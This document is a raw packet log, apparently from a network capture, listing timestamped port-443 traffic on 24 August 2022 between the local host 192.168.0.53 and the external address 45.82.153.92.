Aug 24, 2022 11:19:03.758956909 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.758964062 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.762474060 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.762638092 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.762733936 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.762803078 CEST	443	49316	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.762933016 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.762948990 CEST	443	49316	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.763194084 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.786567926 CEST	443	49315	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.786664009 CEST	443	49315	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.786745071 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.786845922 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.786976099 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.786992073 CEST	443	49315	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.856776953 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.856815100 CEST	443	49317	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.962253094 CEST	443	49316	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.962285042 CEST	443	49316	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.962373018 CEST	443	49316	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.962394953 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.962418079 CEST	443	49316	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.962508917 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.962522030 CEST	443	49316	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.962529898 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.962667942 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.962675095 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.962678909 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.962682962 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.962687016 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.962691069 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.962694883 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.962697983 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.962702990 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.962939978 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.963310003 CEST	443	49316	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.963413954 CEST	443	49316	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.963560104 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.963571072 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.963711977 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.963716984 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.963721037 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.963723898 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.963728905 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.964571953 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.964610100 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.964629889 CEST	443	49316	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.965528011 CEST	443	49317	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.965665102 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.971332073 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.971362114 CEST	443	49317	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.973650932 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.973680973 CEST	443	49317	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.976433992 CEST	443	49317	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.976780891 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.976795912 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.976804018 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.999804020 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.001060963 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.001307964 CEST	443	49317	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.001482010 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.001504898 CEST	443	49317	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.001739025 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.002490044 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.044758081 CEST	443	49317	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.111984968 CEST	443	49317	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.112082005 CEST	443	49317	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.112124920 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.112282991 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.121989965 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.122026920 CEST	443	49317	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.397283077 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.397339106 CEST	443	49318	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.397466898 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.589941025 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.589986086 CEST	443	49318	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.700050116 CEST	443	49318	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.700280905 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.703720093 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.703749895 CEST	443	49318	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.706762075 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.706792116 CEST	443	49318	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.709630013 CEST	443	49318	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.710750103 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.710766077 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.710772038 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.742590904 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.743877888 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.744122982 CEST	443	49318	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.744281054 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.744302034 CEST	443	49318	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.744411945 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.745209932 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.792764902 CEST	443	49318	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.849400043 CEST	443	49318	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.849493027 CEST	443	49318	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:04.849637985 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.849653006 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.859436035 CEST	49318	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:04.859467983 CEST	443	49318	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:06.953121901 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:06.953181982 CEST	443	49319	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:06.953314066 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:07.884769917 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:07.884809971 CEST	443	49320	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:07.884959936 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.010622025 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.010639906 CEST	443	49320	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:08.118777990 CEST	443	49320	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:08.118954897 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.123465061 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.123473883 CEST	443	49320	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:08.125557899 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.125566959 CEST	443	49320	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:08.128439903 CEST	443	49320	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:08.128803015 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.128813028 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.128818989 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.151495934 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.153003931 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.153192997 CEST	443	49320	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:08.153354883 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.153368950 CEST	443	49320	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:08.153522015 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.154552937 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.196774006 CEST	443	49320	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:08.212239027 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.212258101 CEST	443	49319	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:08.267839909 CEST	443	49320	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:08.267924070 CEST	443	49320	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:08.267973900 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.268079042 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.277350903 CEST	49320	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.277369976 CEST	443	49320	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:08.320805073 CEST	443	49319	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:08.321055889 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.407771111 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.407782078 CEST	443	49319	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:08.450613976 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.450644970 CEST	443	49319	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:08.453449011 CEST	443	49319	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:08.453707933 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.453794956 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:08.453803062 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.176525116 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.218772888 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.218982935 CEST	443	49319	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:09.219113111 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.219150066 CEST	443	49319	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:09.219363928 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.261683941 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.304761887 CEST	443	49319	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:09.368813992 CEST	443	49319	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:09.368917942 CEST	443	49319	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:09.369050980 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.369067907 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.710944891 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.710997105 CEST	443	49321	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:09.711126089 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.732522011 CEST	49319	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.732559919 CEST	443	49319	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:09.836252928 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.836292982 CEST	443	49321	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:09.946445942 CEST	443	49321	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:09.946583986 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.950229883 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.950258970 CEST	443	49321	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:09.952209949 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.952239990 CEST	443	49321	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:09.955019951 CEST	443	49321	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:09.955239058 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.955254078 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.955260038 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.979528904 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.981010914 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.981239080 CEST	443	49321	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:09.981498957 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.981522083 CEST	443	49321	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:09.981750965 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:09.982382059 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.024821997 CEST	443	49321	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.095377922 CEST	443	49321	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.095478058 CEST	443	49321	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.095632076 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.095650911 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.105696917 CEST	49321	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.105732918 CEST	443	49321	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.245332956 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.245383024 CEST	443	49322	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.245511055 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.369304895 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.369344950 CEST	443	49322	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.474863052 CEST	443	49322	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.475001097 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.478588104 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.478616953 CEST	443	49322	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.480566025 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.480597019 CEST	443	49322	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.483362913 CEST	443	49322	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.483689070 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.483702898 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.483710051 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.508027077 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.509578943 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.509814978 CEST	443	49322	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.510031939 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.510055065 CEST	443	49322	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.510260105 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.511194944 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.524007082 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.524091959 CEST	443	49322	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.621745110 CEST	443	49322	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.621859074 CEST	443	49322	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.621993065 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.622070074 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.633249044 CEST	49322	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.633286953 CEST	443	49322	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.975527048 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:10.975563049 CEST	443	49323	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:10.975761890 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.102715969 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.102732897 CEST	443	49323	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.213180065 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.213231087 CEST	443	49324	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.213361025 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.213958025 CEST	443	49323	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.214188099 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.239979982 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.239991903 CEST	443	49323	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.242060900 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.242070913 CEST	443	49323	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.244980097 CEST	443	49323	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.245296001 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.245304108 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.245309114 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.267882109 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.269352913 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.269537926 CEST	443	49323	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.269691944 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.269706011 CEST	443	49323	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.269834042 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.270843029 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.312823057 CEST	443	49323	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.366345882 CEST	443	49323	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.366457939 CEST	443	49323	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.366508007 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.366611958 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.378726959 CEST	49323	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.378746033 CEST	443	49323	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.518917084 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.518968105 CEST	443	49325	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.519140959 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.645253897 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.645293951 CEST	443	49325	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.754684925 CEST	443	49325	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.754901886 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.761100054 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.761130095 CEST	443	49325	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.763086081 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.763117075 CEST	443	49325	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.765892982 CEST	443	49325	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.766236067 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.766251087 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.766257048 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.788944006 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.790266037 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.790503979 CEST	443	49325	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.790652990 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.790677071 CEST	443	49325	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.790893078 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.791575909 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.805758953 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.805847883 CEST	443	49325	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.860296011 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.860312939 CEST	443	49324	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.903543949 CEST	443	49325	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.903649092 CEST	443	49325	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.903682947 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.903817892 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.913013935 CEST	49325	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:11.913053036 CEST	443	49325	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.970980883 CEST	443	49324	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:11.971191883 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:12.058341980 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:12.058372021 CEST	443	49324	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:12.101763010 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:12.101774931 CEST	443	49324	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:12.104511023 CEST	443	49324	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:12.104728937 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:12.104747057 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:12.104867935 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:12.828882933 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:12.871368885 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:12.871572018 CEST	443	49324	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:12.871860027 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:12.871896029 CEST	443	49324	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:12.872117043 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:12.914045095 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:12.960761070 CEST	443	49324	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.024056911 CEST	443	49324	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.024089098 CEST	443	49324	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.024173975 CEST	443	49324	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.024353981 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.024380922 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.024401903 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.024409056 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.024413109 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.024415970 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.024420977 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.024427891 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.326730967 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.326786995 CEST	443	49326	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.326915979 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.432463884 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.452980995 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.453022003 CEST	443	49326	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.474770069 CEST	49324	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.474792004 CEST	443	49324	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.558670044 CEST	443	49326	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.558868885 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.563504934 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.563534975 CEST	443	49326	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.565249920 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.565280914 CEST	443	49326	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.568043947 CEST	443	49326	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.568257093 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.568270922 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.568404913 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.591273069 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.592539072 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.592792988 CEST	443	49326	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:13.592972040 CEST	49326	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:13.592993975 CEST	443	49326	45.82.153.92	192.168.0.53
